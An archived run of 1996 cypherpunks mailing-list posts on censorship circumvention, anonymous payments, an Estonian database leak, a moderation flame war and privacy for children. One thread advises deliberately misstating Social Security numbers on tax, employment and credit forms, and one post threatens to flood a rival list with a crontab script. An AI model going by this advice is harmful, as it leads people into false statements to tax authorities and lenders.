while back about doing this for Singapore.  The suggestion at the time
was not to do it perfectly, but rather to arrange something simple to
allow people to circumvent the censorship enforced through their
compulsory use of a government censored web proxy.

> What we need is an experiment.  Let's pick a country with a near
> police state and design a system so that people in that country
> can freely and securely communicate with each other and the outside
> world with minimal chance of arrest.  Once the system is available,
> we can see if it succeeds in the field.  I'll leave others to
> suggest the target.

I would suggest starting with remailers, rather than interactive
traffic such as web traffic would be the easier target.  Might even
present a positive spin in the press for anonymity and remailers for a
change.

So what good stego techniques are there for text.  Do singaporeans use
a non ascii character set?  (As the Chinese use things like Big5
encoding). Anyone know of any features of the character set that
Singaporeans use which could be used for a subliminal channel?

> > However there are two ways to get anonymous electronic cash, either
> > you start with anonymous electronic cash, or you add the anonymity
> > afterwards via `privacy brokers', once there are a few dozen systems,
> > and trillions flowing around using these systems, it's going to be
> > hard to keep track of it all.
> 
> I still think the eventual payoff is a weak point, but it does make
> me think that in order to stop cryptoanarchy, foreign travel and
> foreign communication would have to be tightly controlled.  

Lets give a simple example of a way to create an anonymous payment
system from a fully traced payment system.  Say that an anonymous
privacy broker started a privacy club.  In this club, the participants
place into the pot $100 traceable ecash.  The privacy broker shuffles
the $100 payments, and hands them out.  The privacy brokers
reputation, or the algorithms ensure that the broker can't cheat and
abscond with money.

> While payment is a weak point, there are many cryptoanarchic activities
> that don't involve payment, such as participating in mailing lists,
> which people may like to do even when their governments disapprove.

Sure, if you keep cypherpunks list going even after crypto discussions
have been outlawed, you can keep discussions, and then the ammount of
ecash usage, and bandwidth may be more condusive to working out
anonymous payment systems.

Adam
--
print pack"C*",split/\D+/,`echo "16iII*o\U@{$/=$z;[(pop,pop,unpack"H*",<>
)]}\EsMsKsN0[lN*1lK[d2%Sa2/d0<X+d*lMLa^*lN%0]dsXx++lMlN/dsM0<J]dsJxp"|dc`




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: =?ISO-8859-1?Q?J=FCri_Kaljundi?= <jk@stallion.ee>
Date: Wed, 13 Nov 1996 03:52:29 -0800 (PST)
To: cypherpunks@toad.com
Subject: Data leak in Estonia
Message-ID: <Pine.GSO.3.93.961113134742.805L-100000@nebula>
MIME-Version: 1.0
Content-Type: text/plain



The following are some news clips from Baltic News Service about a scandal
in Estonia, where some government and private databases were sold on black
market on CD-ROM disks. This brings up an interesting question, who should
own information like police and IRS databases, and is it illegal to copy
such information once it is available.

Juri Kaljundi
jk@stallion.ee

---

SECRET INFO IS SOLD ON BLACK MARKET, ESTONIAN POLICE SAY
   
   TALLINN, Nov 09, BNS - Classified information of important state
   institutions is available on the black market, according to Estonian 
   security police and central criminal police officials.
     
   A database containing information on hundreds of thousands of people,
   collected by the Tax Department, Estonian Mobile Telephone and
   Radiolinja companies, the Social Affairs Ministry and several other
   state agencies and large companies, has hit the black market, the
   Eesti Paevaleht daily reported on Saturday. Supposedly, also Customs
   Department and national car registry databases have been secretly
   copied.
       
   The CD-ROM with the confidential informations costs about 50,000    
   kroons, according to the daily.
     
   Security Police Director General Juri Pihl and acting deputy director
   of the central criminal police, Andres Anvelt, confirmed that numerous
   institutional databases are available on the black market.
 
   Anvelt said he had happened to see a pirate copy of the buildings 
   registry showing all transactions with buildings and their owners.
   "I've also heard that information on who owns which telephone number
   has leaked from mobile telephone companies," he added.
 
   Pihl said security police would investigate information leaks only
   when they concerned security police itself. Looking into database
   thefts is not directly the province of security police, he said.
 
   Such a secret database is a powerful weapon in the hands of organized
   crime, the daily said.
 
   Criminals have managed to take advantage of the insufficient
   protection of electronic databases and are sometimes better informed
   than the police, Anvelt confessed.

Baltic News Service

---

ESTONIAN COMMITEE CLAIMS IT HAS NO INFORMATION ON DATABASES ON BLACK
MARKET
   
   TALLINN, Nov 11, BNS - Chairman of the Estonian parliament's security
   police committee, Vahur Glaase, said he had not enough information on
   allegedly illicit trafficking in classified databases. 
   
   "I have too little information to draw any conclusions," chairman of
   the parliamentary committee controlling the activity of the Estonian
   security police told BNS.
  
   The Eesti Paevaleht daily Saturday claimed that a database containing
   information of the taxation department, the Eesti Mobiiltelefon and 
   Radiolinja mobile telephone companies, the social affairs ministry and
   some other agencies and companies on hundreds of thousands of people
   had arrived on the Estonian black market. Presumably, the illegally 
   copied database also contains data of the customs department and the
   motor vehicles registration center.
     
   Glaase said that while a large proportion of the official information
   is open to the public, the publication of a classified telephone
   number is a crime.
  
   "This seems to smack of misprision, and police must start
   investigating it when an application is filed," Glaase said.
     
   According to the Eesti Paevaleht report a CD-ROM with the illegal
   database costs about 50,000 kroons. The paper claimed that the pirated
   information is a powerful weapon in the hands of criminals.
       
   Security police general director Juri Pihl and central criminal police
   acting assistant director Andres Anvelt confirmed there was
   black-market traffic in many institutions' databases.
       
   Pihl said that the security police would launch an inquiry into the
   information leak if it also concerned the security police. He said
   investigation of database theft was not an immediate task of the
   security police.
 
   According to the criminal code, the potential punishment for
   destroying or manipulating with other people's electronically recorded
   information is punishable with a prison sentence for a term of up to
   one year.

Baltic News Service
   
---
   
ESTONIAN CABINET EXPRESSES SHOCK AT GOVERNMENT DATA LEAK
   
   TALLINN, Nov 12, BNS - The Estonian Cabinet is shocked by the
   appearance on the black market of government information, foreign
   minister and acting prime minister Siim Kallas said.
   
   "It is a complicated problem and the Cabinet is shocked by it," Kallas
   told reporters on Tuesday.
   
   Kallas said Interior Minister Mart Rask had known about the
   information leak since two months ago. "Investigation of the leak has
   started at the Interior Ministry and by today criminal proceedings  
   have been taken in the first case," Kallas said.
     
   Kallas said that in the nearest future the Cabinet would adopt a
   decision obliging state institutions to protect the information at
   their disposal. "The security systems and leaking connections must be 
   checked," he said.
     
   The acting prime minister said that it was important to establish how,
   by which channels and through whom the information came to the black
   market.

Baltic News Service

---

ESTONIAN POLICE QUESTION FIRST PEOPLE IN DATABASES LEAK CASE
   
   TALLINN, Nov 13, BNS - Estonian police Tuesday questioned several  
   people in connection with criminal action brought in the databases
   leak case.
   
   An interview with an alleged author of the black market databases,
   Imre Perli, has been scheduled for Wednesday.
   
   Tallinn police deputy prefect Peeter Sults told BNS that investigators
   had contacted Perli by telephone and he had promised to come for an
   interview.
       
   "Perli is not a suspect," Sults said. "Criminal action was brought 
   concerning the fact of the leak, not any concrete person."
       
   Sults said the perons interviewed were connected with institutions
   from which information had allegedly leaked out.
     
   The Tallinn criminal police brought criminal action in the classified
   information leak case on Tuesday. The action was taken concerning
   violations of regulations of government register keeping or of the use
   of the information contained in such registers. The punishment
   stipulated for this in the criminal code is a fine or a prison  
   sentence for a term of up to two years.
     
   The press has claimed that most of the classified databases were
   compiled by Perli, until September an Eesti Mobiiltelefon mobile
   telephone company employee. He may also have compiled the motor
   vehicles register database by which car owners can be established.
   
   Databases containing thousands of mobile and ordinary telephone  
   numbers, traffic offences, as well as data of the motor vehicles and
   companies registers are currently being offered for sale in Estonia.
   Such databases are of high value for organized crime.

Baltic News Service






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Open Net Postmaster <postmaster@opennet.net.au>
Date: Tue, 12 Nov 1996 18:58:01 -0800 (PST)
To: cypherpunks@toad.com
Subject: Returned mail: User Unknown
In-Reply-To: <19961112.130433.9303.1.alzheimer@juno.com>
Message-ID: <199611130257.NAA25903@rainy-day.openweb.net.au>
MIME-Version: 1.0
Content-Type: text/plain



The address you mailed to is no longer valid.
This is probably because the user in question was an
old Open Net subscriber. Open Net is NO LONGER an ISP,
and has not been since May 1996.

We have no redirection address for that user. Please
remove them from any mailing lists you might have.

This response was generated automatically.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Declan McCullagh <declan@well.com>
Date: Wed, 13 Nov 1996 14:02:04 -0800 (PST)
To: Dave Hayes <dave@kachina.jetcafe.org>
Subject: Re: [REBUTTAL] Censorship on cypherpunks?, from The Netly News
In-Reply-To: <199611132131.NAA16681@kachina.jetcafe.org>
Message-ID: <Pine.GSO.3.95.961113135716.7103A-100000@well.com>
MIME-Version: 1.0
Content-Type: text/plain


It's not a way of saying I don't understand. Instead, I find your
viewpoint incomprehensible and internally inconsistent.

In fact, you Freedom Knight folks seem to be closet censors yourself. Why
do you support not carrying newsgroups like alt.config?

Yes, ownership gives you a license to censor. I'm going to have a party in
my home a few weeks from now. If I don't like what someone is doing, I'll
kick 'em out. I won't do it lightly, but I will fight for my right to do
so.

Oh, and I plan to subscribe to the freedom-knights mailing list and infest
it the way Vulis did cypherpunks. Every hour, on the hour, a crontab
script will flood it with rants about Dave (fart) Hayes.

What will you do then?

-Declan



On Wed, 13 Nov 1996, Dave Hayes wrote:

> > I am amused. I gave Dave Hayes about an 8.5 out of 10 on the scale of
> > meaningless political rants.
> 
> Is this another way of saying you do not understand, since you
> can attribute no meaning? 
> 
> > * "Political safety?" I stand by my record as a writer. Check out
> > http://www.eff.org/pub/Publications/Declan_McCullagh/ for some of my
> > recent articles. Political safety? Hardly.
> 
> It never ceases to amaze me how human beings think in terms of
> indoctrination and repetition. (Isn't that repetitive too?) 
> 
> In this example, previous works are cited as reasons why a current
> work is or is not something. As most people in probability theory can
> tell you, the chance of something being true has nothing to do with
> the results of previous trials. 
> 
> In other words, your record is irrelavent. I calls 'em as I sees 'em.
> 
> > * Dave says "Notice that the net is compared to a home or private club." 
> > Wrong. I never compared the Net to such. However, a mailing list run on a
> > computer in someone's home with his own cash is very similar to a private
> > club.  
> 
> And you say you aren't comparing the net to a home or club? Aren't 
> mailing lists on the net? Aren't you comparing them to a club? 
> Or are you merely being unclear about your comparisons? 
> 
> > * Contrary to what you seem to be asserting, Gilmore hasn't blocked Vulis
> > from posting. 
> 
> What seems to be often isn't. I am not asserting any such thing. In
> fact, Mr. Gilmore hasn't done anything of note since Vulis still gets
> mail off the list...it's more symbolic. Interestingly enough, the only
> "damage" I see is to Mr. Gilmore's reputation. This is hardly a loss
> in my opinion, but I assume it means something to a reporter...
> 
> > * Dave warns us to consider "what would happen if one parent company owned
> > *all* communications media." Then we have problems. I've written about
> > this in an Internet Underground magazine column. However, this is not the
> > case now. 
> 
> It does not have to be the case for you to see the intended point,
> which you apparently missed. I'll say it again: Ownership should not
> be a license for censorship. 
> 
> > Or are you arguing the government should get involved and force
> > Gilmore to allow Vulis on his list?
> 
> No. That would be the same thing in a different guise. Please read my
> article again and attempt to comprehend what I am saying. It would
> truly help your comprehension if you failed to react in a Pavlovian
> manner to it.
> 
> > By the way, if you haven't figured it out yet, Mr. "Freedom Knight of
> > Usenet,"  a private mailing list is NOT Usenet. Get a clue. 
> 
> The clue to be gotten is yours. I never implied or intended such a
> misunderstanding.
> ------
> Dave Hayes - Altadena CA, USA - dave@jetcafe.org 
> Freedom Knight of Usenet - http://www.jetcafe.org/~dave/usenet
> 
> A philosopher called on Nasrudin and found him away from home. Infuriated, 
> he wrote 'Stupid Oaf' on his door. As soon as Nasrudin got home and saw this,
> he rushed to the philosopher's house. "I'd forgotten", he said, "that you 
> were to call. And I apologize for not having been at home. I remembered 
> our appointment as soon as I saw that you'd left your name on my door..."
> 
> 
> 





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Open Net Postmaster <postmaster@opennet.net.au>
Date: Tue, 12 Nov 1996 19:09:05 -0800 (PST)
To: cypherpunks@toad.com
Subject: Returned mail: User Unknown
In-Reply-To: <7gPaXD1w165w@bwalk.dm.com>
Message-ID: <199611130309.OAA26011@rainy-day.openweb.net.au>
MIME-Version: 1.0
Content-Type: text/plain



The address you mailed to is no longer valid.
This is probably because the user in question was an
old Open Net subscriber. Open Net is NO LONGER an ISP,
and has not been since May 1996.

We have no redirection address for that user. Please
remove them from any mailing lists you might have.

This response was generated automatically.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Open Net Postmaster <postmaster@opennet.net.au>
Date: Tue, 12 Nov 1996 19:26:21 -0800 (PST)
To: cypherpunks@toad.com
Subject: Returned mail: User Unknown
In-Reply-To: <199611122147.PAA06047@proust.suba.com>
Message-ID: <199611130326.OAA26123@rainy-day.openweb.net.au>
MIME-Version: 1.0
Content-Type: text/plain



The address you mailed to is no longer valid.
This is probably because the user in question was an
old Open Net subscriber. Open Net is NO LONGER an ISP,
and has not been since May 1996.

We have no redirection address for that user. Please
remove them from any mailing lists you might have.

This response was generated automatically.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: snow <snow@smoke.suba.com>
Date: Wed, 13 Nov 1996 12:23:16 -0800 (PST)
To: SUCRUM22_at_INDY-ADP@smtp-gw.cv62.navy.mil
Subject: Re: a retort + a comment + a question = [RANT]
In-Reply-To: <9610108476.AA847661103@smtp-gw.cv62.navy.mil>
Message-ID: <199611132026.OAA02005@smoke.suba.com>
MIME-Version: 1.0
Content-Type: text/plain


Some Swabbie scribbled:
>  ---------------------------------------------------------------------- 
>  tim may wrote:
>  >"...and that discussions of other topics bother you should be a clear 
>  >indication you're probably on the wrong list."
>         uh, that's _why_ i am on this list...
>  >"Having a "navy.mil" domain probably is another reason, unless you 
>  >are only hear to monitor our discussions of using cryptography to 
>  >undermine the state, to liberate military secrets with BlackNet and 
>  >the Information Liberation Front, and to punish the millions of 
>  >those in the military-industrial complex who have so richly earned 
>  >their eventual punishments.
>         military secrets, eh?  tell me something mr may, what secrets 
>  have you uncovered in your undaunting quest to expose those corrupt 

     Believe me, if Blacknet ever becomes a reality, there will be 
military secrets for sale. 

>  little guys in uniform?  mr may - i serve in the US Navy so you don't 

     The little guys corruption isn't a secret. I was there, and I know. 
Little People have Little Minds, and the scope of their corruption is 
mostly minor and annoying. 

>  military does for the US is a good thing.  i skipped collage (don't 
>  ask why) after graduating early from HS to enlist in the navy.  

     Didn't like your art classes?  

>  keeping you free to bitch is why i am here.  never forget that the 
>  freedom you enjoy comes with a price, mr may.
>         the schools that you send your kids to (forgive me if you're 
>  celibate or childless) are run by the govt.  am i saying they do a good 
>  job?  not necessarily, but what i _am_ saying is that your kids _still_ 

     They did a better job when the governments _didn't_ run them, or at 
least the Federal Government didn't run them. 

>  go.  i am almost positive, despite attempts to the contrary, that you 
>  make use of the US postal system. 

     The US Postal System is not a government agency, it is a private 
company with a guarenteed monopoly.

> the phone lines that you connect 
>  that computer to were installed by - guess who? - there are a hundred 

    The local Phone Companies, not the government.

>  other things you and i and everyone use that wouldn't be there if it 
>  weren't for the USG (or state/county/municipal govt's).  tell me mr 

    Things like Jails for drug users, Massive corruption and forced 
economic redistribuion. Idiotic laws &etc. Yes, lots of things that wouldn't
be there. 

Petro, Christopher C.
petro@suba.com <prefered for any non-list stuff>
snow@smoke.suba.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Open Net Postmaster <postmaster@opennet.net.au>
Date: Tue, 12 Nov 1996 19:31:23 -0800 (PST)
To: cypherpunks@toad.com
Subject: Returned mail: User Unknown
In-Reply-To: <Pine.GSO.3.95.961112093119.7009B-100000@well.com>
Message-ID: <199611130331.OAA26153@rainy-day.openweb.net.au>
MIME-Version: 1.0
Content-Type: text/plain



The address you mailed to is no longer valid.
This is probably because the user in question was an
old Open Net subscriber. Open Net is NO LONGER an ISP,
and has not been since May 1996.

We have no redirection address for that user. Please
remove them from any mailing lists you might have.

This response was generated automatically.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Open Net Postmaster <postmaster@opennet.net.au>
Date: Tue, 12 Nov 1996 19:44:43 -0800 (PST)
To: cypherpunks@toad.com
Subject: Returned mail: User Unknown
In-Reply-To: <199611122025.MAA24148@netcom13.netcom.com>
Message-ID: <199611130344.OAA26256@rainy-day.openweb.net.au>
MIME-Version: 1.0
Content-Type: text/plain



The address you mailed to is no longer valid.
This is probably because the user in question was an
old Open Net subscriber. Open Net is NO LONGER an ISP,
and has not been since May 1996.

We have no redirection address for that user. Please
remove them from any mailing lists you might have.

This response was generated automatically.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Open Net Postmaster <postmaster@opennet.net.au>
Date: Tue, 12 Nov 1996 20:00:55 -0800 (PST)
To: cypherpunks@toad.com
Subject: Returned mail: User Unknown
In-Reply-To: <v03007802aead19eacee0@[207.167.93.63]>
Message-ID: <199611130400.PAA26479@rainy-day.openweb.net.au>
MIME-Version: 1.0
Content-Type: text/plain



The address you mailed to is no longer valid.
This is probably because the user in question was an
old Open Net subscriber. Open Net is NO LONGER an ISP,
and has not been since May 1996.

We have no redirection address for that user. Please
remove them from any mailing lists you might have.

This response was generated automatically.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: ISP-TV Main Contact <isptv@access.digex.net>
Date: Wed, 13 Nov 1996 12:10:13 -0800 (PST)
Subject: CDT's Jonah Seiger on ISP-TV's "Real Time"
Message-ID: <199611132010.PAA23010@access1.digex.net>
MIME-Version: 1.0
Content-Type: text/plain


*** ISP-TV Program Announcement:

	Live interview with Jonah Seiger, 
	Policy Analyst for the Center for Democracy and Technology
***

*** Monday, Nov. 18 ***
*** 9:00 PM ET      ***

Jonah Seiger, Policy Analyst and online organizer with the Center for
Democracy and Technology (CDT), will be on ISP-TV's "Real Time" interview
series this monday night.

Seiger has been very active on both the crypto rights front and opposing
the Communications Decency Act.  He worked with Senator Burns to put the
first Congressional Hearing on the Internet, played a key role in
organizing an online petition which generated over 115,000 signatures in
opposition to the CDA, and helped to organize the "Black Thursday
Protest." 

We will ask Jonah questions about what the future of crypto regulation
will be in the next Congress, and the efforts of the Citizens Internet
Empowerment Coalition (CIEC) in fighting against the CDA in the Supreme
Court.

This video interview can be viewed on the ISP-TV main CU-SeeMe reflector
at IP 205.197.247.33, or other ISP-TV affiliate reflectors listed at
http://www.digex.net/isptv/members.html

See URL http://www.digex.net/isptv for more information about the ISP-TV
Network

To obtain Enhanced CU-SeeMe software, go to:

	http://goliath.wpine.com/cudownload.htm







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Paul George <george@justice.usdoj.gov>
Date: Wed, 13 Nov 1996 12:21:30 -0800 (PST)
To: "David E. Smith" <dsmith@prairienet.org>
Subject: [TEST] [IGNORE] [NOISE]
In-Reply-To: <199611100121.TAA12178@bluestem.prairienet.org>
Message-ID: <Pine.NEB.3.95.961113151733.28828A-100000@sneezy.usdoj.gov>
MIME-Version: 1.0
Content-Type: text/plain


My email subscription name is not what I thought it was.  I'm bouncing a
note off the list to find out what it is.

Paul George
Do not think a minute that my opinions are even close to that of my
employer.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Dave Hayes <dave@kachina.jetcafe.org>
Date: Wed, 13 Nov 1996 15:20:59 -0800 (PST)
To: freedom-knights@jetcafe.org
Subject: Re: [REBUTTAL] Censorship on cypherpunks?, from The Netly News
Message-ID: <199611132320.PAA17335@kachina.jetcafe.org>
MIME-Version: 1.0
Content-Type: text/plain


> It's not a way of saying I don't understand. Instead, I find your
> viewpoint incomprehensible and internally inconsistent.

Which, of course, means that there is nothing to understand...for you.
However, I do observe that there are meanings in things I, myself,
find both incomprehensible and inconsistent. Just because I am unable
to understand does not mean that there is no understanding to be had.
I am not that important. Are you?

> In fact, you Freedom Knight folks seem to be closet censors yourself. Why
> do you support not carrying newsgroups like alt.config?

I never have supported or opposed alt.config. I have said that it is
meaningless, but that was after I understood its purpose. ;-)

> Yes, ownership gives you a license to censor. I'm going to have a party in
> my home a few weeks from now. If I don't like what someone is doing, I'll
> kick 'em out. I won't do it lightly, but I will fight for my right to do
> so.

Of course, you may invite anyone you choose, since a party is usually
had by inviting people whom you select. If you invite them and then
subsequently kick them out when they do things you do not want them to
do, I will chastise -you- (if I am present) for your lack of judgement
in whom to invite. Their behavior would merely something to learn
from, yours would be fashionably dishonorable.

BTW, "Kicking them out" is not censorship. A party and a mailing list
are usually two different things. The former may include the latter,
but the latter is not anything like the former.

> Oh, and I plan to subscribe to the freedom-knights mailing list and infest
> it the way Vulis did cypherpunks. Every hour, on the hour, a crontab
> script will flood it with rants about Dave (fart) Hayes.

You won't do this, because I won't let you on the list. I, unlike you
or Mr. Gilmore, have the judgement on whom to invite to my list.

> What will you do then?

Even if you did such a thing, I have a mail filter. Your messages
would be unceremoniously discarded. 

Have you learned nothing from USENET? 
------
Dave Hayes - Altadena CA, USA - dave@jetcafe.org 
Freedom Knight of Usenet - http://www.jetcafe.org/~dave/usenet

Ask the American public if they want an FBI Wiretax and they'll say 'no.'  
If you ask them do they want a feature on their phone that helps the FBI find 
their missing child they'll say, 'Yes.'"
          - FBI Directory Louis Freeh, on Digital Telephony, US House
            (Subcmte. on Telecommunications & Finance) hearing on the Digital
            Telephony bill, 09/13/94).









From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: gimonca@skypoint.com (Charles Gimon)
Date: Wed, 13 Nov 1996 13:23:24 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: A really short one time pad. (fwd)
Message-ID: <m0vNmm1-0003J9C@mirage.skypoint.com>
MIME-Version: 1.0
Content-Type: text/plain


Forwarded message:
> Date: Wed, 13 Nov 1996 08:02:16 -0600 (CST)
> From: Ron Strasburg <rstrasbu@bronco1.hastings.edu>
> To: cypherpunks@toad.com
> Subject: Re: A really short one time pad.
> 
> On Tue, 12 Nov 1996, Timothy C. May wrote:
> > At 5:39 PM -0800 11/12/96, Sean Roach wrote:

[deletia]
> > >For that patter the nth root of any prime number.
> > >Cheap, I know.  Wonder if this type of "one time pad" is as foolproof as
> > >truly randomly generated ones.

> > 
> > You needn't wonder. These are not one time pads. Read any opening chapter
> > of any book on crypto to see why.
> > 

> this was proposed a couple months ago by a Robert Shueey, he first posted 
> asking if "Irrational=Random".
> not sure if he got any responses. 

"The Broken Dice" by Ivar Ekeland has a chapter that discusses Shannon,
Kolmogorov, what is random and what isn't. Interesting, readable,
non-technical.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr.Dimitri Vulis KOTM)
Date: Wed, 13 Nov 1996 13:52:05 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: Censorship on cypherpunks?, from The Netly News
In-Reply-To: <Pine.SUN.3.91.961113103859.18273A-100000@eff.org>
Message-ID: <wLmcXD1w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain


Declan McCullagh <declan@eff.org> writes:

> If Vulis thinks I did an "excellent job," then perhaps I should have 
> criticized him more harshly.

What's the connection?

---

Dr.Dimitri Vulis KOTM
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Black Unicorn <unicorn@schloss.li>
Date: Wed, 13 Nov 1996 12:36:36 -0800 (PST)
To: Hal Finney <hal@rain.org>
Subject: Re: Secrecy: My life as a nym. (Was: nym blown?)
In-Reply-To: <199611111626.IAA31552@crypt>
Message-ID: <Pine.SUN.3.94.961113153109.2905A-100000@polaris>
MIME-Version: 1.0
Content-Type: text/plain


On Mon, 11 Nov 1996, Hal Finney wrote:

> Black Unicorn makes a lot of good points regarding privacy.  One thing
> I wanted to follow up on:
> 
> > Unfortunately, in the United States most citizens only become interested
> > in privacy in their 20s or so.  By this time it is difficult to overcome
> > the mass of information which has been stored up.  (Pseudocide can be an
> > attractive option for some perhaps).
> 
> I have two kids entering their teens, and I'm sure other list members are
> parents as well.  What can we do for our children to help them enter their
> adult lives with better chances to retain privacy?  Unicorn mentions keeping
> them absent from school on picture day, although I'm not sure how much this
> helps.  I suppose it makes it harder for an investigator to find out what
> they look(ed) like.  Then when they get old enough to drive you have a new
> problem avoiding the photo (and thumbprint) on the license.

Yearbooks are literally a publication.  If you wish to be extreme about
privacy, it is hardly prudent to allow your children's name and face to be
linked in a widely diseminated publication.

Fingerprints are not mandatory, or even requested, on all driver's
licenses.  Many states do not keep copies of the photos.  The only records
available are name, DOB, etc.  (Illinois was one of these, but I haven't
checked lately).

> 
> Are there other measures which parents could take while their children are
> young to get them off to a good start, privacy-wise?
>

Avoid getting a social security number.
You can list them as dependents for several years if you stall with the
IRS about their social security number.  The worst I have even seen the
IRS do is send (rather bland) letters complaining about the number being
in error.  They hardly have time to follow up on each one.  And if they
do, failing to apply for a number is hardly a crime.  Each parent could
easily say "I thought you did it."  "No, honey, you did."  "No, I didn't."
The auditer would kick you out of the office.

> Hal
> 

--
Forward complaints to : European Association of Envelope Manufactures
Finger for Public Key   Gutenbergstrasse 21;Postfach;CH-3001;Bern
Vote Monarchist         Switzerland





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Black Unicorn <unicorn@schloss.li>
Date: Wed, 13 Nov 1996 12:46:23 -0800 (PST)
To: "Igor Chudov @ home" <ichudov@algebra.com>
Subject: Re: Secrecy: My life as a nym. (Was: nym blown?)
In-Reply-To: <199611120414.WAA22624@manifold.algebra.com>
Message-ID: <Pine.SUN.3.94.961113153536.2905B-100000@polaris>
MIME-Version: 1.0
Content-Type: text/plain


On Mon, 11 Nov 1996, Igor Chudov @ home wrote:

> Jim McCoy wrote:
> > >Are there other measures which parents could take while their children are
> > >young to get them off to a good start, privacy-wise?
> > 
> > Do not declare your children as dependants.  If you do then you are required
> > to get a SSN for them, but if you are willing to waive the tax savings there
> > is no requirement than children have a SSN.  Not having a handy universal
> > index number like a SSN makes it a lot harder for people to accumulate
> > statistics on your kids.
> 
> This is an interesting topic. I apologize if my questions are too trivial,
> but here they are: 
> 
> 	1) Can a person without an SSN have a credit record? Some
> 	   may say that a credit record is a bad thing to have,
> 	   but I am still interested in a possibility.

Yes.  Again, why this is so hard to understand I don't know.  I've said it
20 times on this list.  The SSN is only really revealed officially to the
Social Security Administration.  Even the IRS can't "get" it from the SSA,
they simply get a note from SSA which says "the name and number here don't
match up according to our records."  If they could get the number, they'd
just correct it, rather than sending you letters about it ever 6 months.

> 	2) Will private lenders (such as credit card issuers or
> 	   mortgage companies) agree to extend credit to a person
> 	   without an SSN or to someone who refuses to give out his SSN?

Extremely unlikely as the SSN is used to key the credit search.  I don't
want to encourage fraud or the like, but their ability to check for false
numbers is limited.

> 	3) Will the state issue a driver's license to someone who does not
> 	   have/does not wish to give out their SSN?

Depends on the state.  Some yes, some won't check, some require SSN cards
but accept alternative identification, some say no but will let you if you
complain enough.  You get the idea.

> 	4) Will states' police (where applicable) approve purchases of
> 	   firearms if purchasers do not state their ssn (misstating it
> 	   may be a crime) on an application?

This, again, depends on the state.
The SSN is available to police only if it is in a DMV or police record.
They cannot (excepting perhaps in extreme emergencies, though I've not
heard of such) get it directly from the SSA.

> 	5) Employers are required to pay certain taxes and therefore
> 	   they, in my understanding, need to know their employees SSNs.
> 	   How can people get around that (unless they do not need to work)?

Make a mistake on your form.  When the IRS discovers it, they will send
you, and perhaps your employer but I'm not sure, a letter complaining
about the error and telling you they cannot help you with this and you
have to go to the SSA to deal with it.

I have seen letters which threaten to withhold returns, but usually enough
complaints results in a return being issued anyhow.

> 	6) Can someone without an SSN obtain various kinds of insurance?

See above.
There is no way to verify that your SSN is correct if you did not tell
anyone what it was.

> It is my understanding that the law does not regulate use of social 
> security numbers between private parties. Businesses are free to refuse 
> to do business with someone who does not present them an SSN. In real 
> life, how inconvenient is life of a privacy-concerned individual?

As inconvenient is it is to give private businesses a string of random
numbers.

> Say, John Anonymous is a young 15 years old who anticipates to become an
> engineer and have a middle class life. He wants to get married, have
> children, drive a car, obtain insurance, work at some big company,
> travel around the world, invest in mutual funds or buy stocks, and so
> on. Reliance on government help is not important to him, so he would not
> apply for an SSN solely to get Social Security, welfare and such.
> 
> His parents are cypherpunks and did not obtain an SSN for John. How much 
> effort would it cost him to live a life outlined above?

As I mentioned, I have two associates who don't have, or have never used
their numbers and live quite happily in the United States.

The weak link is the fact that the SSA will not issue the actual numbers
to anyone but the applicant.

> Thank you
> 
> 	- Igor.
> 

--
Forward complaints to : European Association of Envelope Manufactures
Finger for Public Key   Gutenbergstrasse 21;Postfach;CH-3001;Bern
Vote Monarchist         Switzerland





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rich Graves <rcgraves@ix.netcom.com>
Date: Wed, 13 Nov 1996 15:51:35 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: Copyright violations
In-Reply-To: <19961112.130433.9303.1.alzheimer@juno.com>
Message-ID: <328A5ED2.3D94@ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


I'm sure the article was very interesting, but I'm not even going to 
look at them anymore unless you start using more descriptive subject 
lines than the cutesie "copyright violations." At least with John 
Young's forwards, you can usually <g> guess what the article is about. 
Thanks for your support.

-rich




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Black Unicorn <unicorn@schloss.li>
Date: Wed, 13 Nov 1996 12:52:19 -0800 (PST)
To: "Timothy C. May" <tcmay@got.net>
Subject: Re: Secrecy: My life as a nym. (Was: nym blown?)
In-Reply-To: <v03007800aeade37ef979@[207.167.93.63]>
Message-ID: <Pine.SUN.3.94.961113154444.2905C-100000@polaris>
MIME-Version: 1.0
Content-Type: text/plain


On Tue, 12 Nov 1996, Timothy C. May wrote:

> At 8:26 AM -0800 11/11/96, Hal Finney wrote:
> 
> >I have two kids entering their teens, and I'm sure other list members are
> >parents as well.  What can we do for our children to help them enter their
> >adult lives with better chances to retain privacy?  Unicorn mentions keeping
> >them absent from school on picture day, although I'm not sure how much this
> >helps.  I suppose it makes it harder for an investigator to find out what
> >they look(ed) like.  Then when they get old enough to drive you have a new
> >problem avoiding the photo (and thumbprint) on the license.
> >
> >Are there other measures which parents could take while their children are
> >young to get them off to a good start, privacy-wise?
> 
> I think there are two important domains of privacy to distinguish:
> 
> 1. The mundane.
> 
> 2, The political.
> 
> The mundane domain is what most people think of initially, Things like "How
> do I keep my name out of the system?" Or the point about kids.
> 
